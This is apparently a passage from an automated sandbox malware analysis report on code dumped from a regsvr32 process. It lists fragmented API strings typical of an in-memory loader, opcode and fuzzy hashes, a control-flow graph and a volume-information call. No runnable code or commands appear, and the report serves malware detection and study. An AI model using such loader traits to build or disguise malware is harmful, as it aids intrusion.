                                                                                                  • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                  • API String ID: 394283112-3605381585
                                                                                                  • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                  • Instruction ID: f9d2168090b9ee68639b780b19973b053e8885a7077621bd798949b053d58748
                                                                                                  • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                  • Instruction Fuzzy Hash: 75520430628B488BC729EF18D8856FAB7F1FB54304F14466DE88BC7251DB74E946CB86
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E040A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 401 e040a0-e04136 call e19f38 404 e041ca-e04202 GetVolumeInformationW 401->404 405 e0413c-e041c4 call e0a940 401->405 405->404
                                                                                                  APIs
                                                                                                  • GetVolumeInformationW.KERNELBASE ref: 00E041EB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.632618428.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InformationVolume
                                                                                                  • String ID: Ql$v[
                                                                                                  • API String ID: 2039140958-138011117
                                                                                                  • Opcode ID: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                  • Instruction ID: 105e5b352269b3c7548b16fa6af71a6eda2f1cf9fc6d7a4a2763d1c2fb832673
                                                                                                  • Opcode Fuzzy Hash: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                  • Instruction Fuzzy Hash: 1131397051CB848BD7B8DF18D48579AB7E0FB88315F60895DE88CC7295CF789888CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%